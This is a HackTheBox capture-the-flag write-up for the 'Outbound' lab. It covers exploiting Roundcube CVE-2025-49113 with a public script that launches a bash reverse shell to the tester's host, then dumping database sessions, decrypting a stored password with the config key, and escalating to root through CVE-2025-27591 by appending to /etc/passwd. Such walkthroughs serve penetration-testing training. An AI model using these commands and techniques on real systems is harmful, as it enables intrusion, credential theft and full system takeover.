Outbound HTB Writeup — Roundcube CVE-2025–49113 Exploit
6 min readNov 21, 2025
–
Introduction
In this HackTheBox lab, Outbound, I explored a real-world scenario involving a Roundcube webmail server. The objective was to perform end-to-end penetration testing from initial enumeration and vulnerability discovery to exploitation, credential harvesting, and ultimately gaining root access.
Reconnaissance
I began the engagement by performing a comprehensive Nmap scan to identify open ports and running services on the target machine.
nmap 10.10.11.77 -sV -A
The results were as follows:
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 256 0...Outbound HTB Writeup — Roundcube CVE-2025–49113 Exploit
6 min readNov 21, 2025
–
Introduction
In this HackTheBox lab, Outbound, I explored a real-world scenario involving a Roundcube webmail server. The objective was to perform end-to-end penetration testing from initial enumeration and vulnerability discovery to exploitation, credential harvesting, and ultimately gaining root access.
Reconnaissance
I began the engagement by performing a comprehensive Nmap scan to identify open ports and running services on the target machine.
nmap 10.10.11.77 -sV -A
The results were as follows:
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)80/tcp open http nginx 1.24.0 (Ubuntu)|_http-title: Did not follow redirect to http://mail.outbound.htb/|_http-server-header: nginx/1.24.0 (Ubuntu)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The scan revealed two active services:
- SSH (port 22) — a potential remote login point.
- HTTP (port 80) — a web server running nginx 1.24.0, which redirected to the domain
mail.outbound.htb.
To correctly interact with the web application, I updated my /etc/hosts file to resolve the domain to the target IP:
echo “10.10.11.77 mail.outbound.htb” | sudo tee -a /etc/hosts
This ensured mail.outbound.htbresolved to the target, enabling further web enumeration.
Exploitation
After accessing the web application with the provided credentials User: tylerPass: LhKL1o9Nm3X2, I observed that the mailbox was completely empty.
Press enter or click to view image in full size
To identify potential vulnerabilities, I used Nuclei, a fast and configurable vulnerability scanner developed by ProjectDiscovery. I ran the following command:
nuclei -u http://mail.outbound.htb -tags cves
Note:* Nuclei requires regularly updated YAML templates to detect known vulnerabilities, misconfigurations, CVEs, and exposures in web applications, APIs, and servers.*
The scan flagged a critical vulnerability:
[CVE-2025-49113:version_check] [http] [critical] http://mail.outbound.htb/ ["Roundcube Version: 1.6.10"]
This indicated that the target was running a vulnerable version of Roundcube Webmail susceptible to Remote Code Execution (RCE).
I proceeded with the exploit:
- Clone the exploit repository:
git clone https://github.com/hakaioffsec/CVE-2025-49113-exploitcd CVE-2025-49113-exploit
2. Install requirements:
sudo apt install php-cli
3. Configure the payload using the provided credentials and a reverse shell:
php CVE-2025-49113.php http://mail.outbound.htb <username> <password> "bash -c 'bash -i >& /dev/tcp/<your-ip>/<port> 0>&1'"
4. Set up a Netcat listener on my local machine:
nc -lnvp 4444
5. Execute the exploit:
php CVE-2025-49113.php http://mail.outbound.htb tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/10.10.14.59/4444 0>&1'"
The tool confirmed:
[+] Starting exploit (CVE-2025-49113)...[*] Checking Roundcube version...[*] Detected Roundcube version: 10610[+] Target is vulnerable![+] Login successful![*] Exploiting...
Shortly after, the reverse shell connected to my listener:
Listening on 0.0.0.0 4444Connection received on 10.10.11.77 47002bash: no job control in this shellwww-data@mail:/$
At this stage, I had successfully obtained a **low-privileged shell as ****www-data** on the target system.
Post-Exploitation: Database Enumeration
After obtaining a low-privileged shell on the target, I started enumerating the Roundcube Webmail configuration files. Accessing the configuration allowed me to identify critical credentials stored on the system. I navigated to the Roundcube config directory and read the main configuration file:
cat /var/www/html/roundcube/config/config.inc.php
From the file, I discovered the MySQL database credentials:
Database user: roundcubeDatabase password: RCDBPass2025Database host: localhostDatabase: roundcube
Additionally, I confirmed that MySQL was running on its default port 3306, giving me an opportunity to query the database directly.
Enumerating Active Sessions
Using the retrieved credentials, I connected to the Roundcube database to enumerate active user sessions:
mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e "use roundcube; select * from session;" -E
The output revealed session IDs, associated IPs, and session variables for users currently logged in. For example:
*************************** 2. row ***************************sess_id: 6a5ktqih5uca6lj8vrmgh9v0ohip: 172.17.0.1vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7user_id: 1username: jacob
Decoding Session Data
The session data retrieved from the Roundcube database appeared to be encoded. To extract meaningful information such as usernames, session tokens, or potentially passwords I used CyberChef for decoding and decryption.
Press enter or click to view image in full size
L7Rv00A8TuwJAr67kITxxcSgnIk25Am/
From the config.inc.php file, I had already noted the Roundcube encryption key:
rcmail-!24ByteDESkey*Str
This key is essential for decrypting session data and user credentials. After researching Roundcube’s encryption mechanism, I confirmed it uses Triple-DES (DES-EDE3-CBC) for encrypting sensitive values.
Preparing the Data for Decryption
Before decryption, the session data must be decoded from Base64 to hexadecimal, providing a valid input for the Triple-DES algorithm.
Press enter or click to view image in full size
Additionally, the decryption requires an initialization vector (IV). For Roundcube, the IV is 8 bytes long and can be derived from the first 8 alphanumeric pairs of the hex-converted Base64 input:
IV: 2f b4 6f d3 40 3c 4e ecInput (hex): 09 02 be bb 90 84 f1 c5 c4 a0 9c 89 36 e4 09 bf
Decrypting in CyberChef
Using the above IV and the encryption key, I configured CyberChef to:
- Convert the Base64 session string to hex.
- Apply Triple-DES (DES-EDE3-CBC) decryption with the known key and IV.
This process successfully revealed Jacob’s password and other session information, enabling further exploitation such as session hijacking or lateral movement on the target machine.
Press enter or click to view image in full size
Switching to Jacob
After successfully decryption the session data, I retrieved Jacob’s password:
595mO8DmwGeD
With this credential, I performed a user switch to assume Jacob’s account on the target system:
su jacob
Post-Exploitation: SSH Credential Discovery and Access
After switching to Jacob’s account, I performed a directory enumeration and discovered an email containing SSH credentials in his mailbox:
cat /home/jacob/mail/INBOX/jacob
The email from Mel indicated a recently enabled resource monitoring system and included the updated password for Jacob’s SSH account:
Username: jacobPassword: gY4Wr3a1evp4
With these credentials, I was able to connect to the target system via SSH:
ssh jacob@10.10.11.77
When prompted, I entered the password extracted from the email. Authentication succeeded, granting me a remote SSH session as Jacob, which provided a more stable and interactive shell for further enumeration and potential privilege escalation.
Retrieving the User Flag
After successfully establishing an SSH session as Jacob, I proceeded to locate the user flag on the system. Using the standard search for HackTheBox-style flags, I ran:
find / -type f -name "user.txt" 2>/dev/null
This command located the user flag in Jacob’s home directory. Displaying its contents confirmed successful retrieval:
cat /home/jacob/user.txt
At this point, I had successfully captured the user flag, completing the initial compromise of the system.
Privilege Escalation: Exploiting CVE-2025–27591
After retrieving the user flag, I checked the sudo privileges for Jacob to identify potential paths for privilege escalation:
sudo -l
The output revealed that Jacob could run the below command with wildcards without a password:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
This indicated a potential command injection vulnerability. After research, I identified CVE-2025–27591, which allows privilege escalation via improperly handled file logging in the below utility.
Exploiting the Vulnerability
I located a publicly available proof-of-concept exploit for this CVE:
https://github.com/BridgerAlderson/CVE-2025-27591-PoC/blob/main/exploit.py
I transferred the exploit to the target, edited it if necessary, and executed it as Jacob:
nano exploit.pypython3 exploit.py
The exploit performed the following steps:
- Verified that
/var/log/belowwas world-writable. - Removed the existing log file and created a symlink to
/etc/passwd. - Triggered the
below recordcommand to append a malicious root entry. - Switched to a root shell via the newly created user.
Upon successful exploitation, I obtained a root shell:
root@outbound:/home/jacob#
Retrieving the Root Flag
Finally, I retrieved the root flag to complete the capture-the-flag objective:
cat /root/root.txt
This confirmed full system compromise and completion of the exercise.
For more detailed walkthroughs and write-ups, check out my GitHub